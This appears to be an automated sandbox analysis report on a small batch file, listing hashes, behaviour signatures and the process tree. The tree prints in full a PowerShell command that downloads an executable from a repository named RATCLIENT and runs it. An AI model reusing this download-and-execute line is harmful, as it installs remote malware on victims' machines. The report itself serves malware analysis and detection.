Analysis
-
max time kernel
43s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
30-05-2024 12:57
Static task
static1
Behavioral task
behavioral1
Sample
Test.bat
Resource
win7-20240508-en
windows7-x64
4 signatures
150 seconds
General
-
Target
Test.bat
-
Size
186B
-
MD5
9c4d95c3db51f66fed113f3f97c634ed
-
SHA1
4aa3b2737d2883c3546ba198dbfe01354ed280b3
-
SHA256
624dddefe23183f69741089a3a0a54a6d5fe8b95d12479dba2a5972880c7013a
-
SHA512
ed3e20e2123239d57b8e9da07c576cd9255ab386ba33025077ce7eb125a1a018375381c1886a1312d478930b4844149ece2f8f21f0972c200f154b5b5790cf9b
Score
8/10
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 852 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 852 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 1544 wrote to memory of 852 1544 cmd.exe powershell.exe PID 1544 wrote to memory of 852 1544 cmd.exe powershell.exe PID 1544 wrote to memory of 852 1544 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Test.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command cd C:\Windows mkdir .temp2 Invoke-WebRequest https://github.com/1048discord/RATCLIENT/raw/main/Beta.exe -OutFile Client.exe start Client.exe2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:852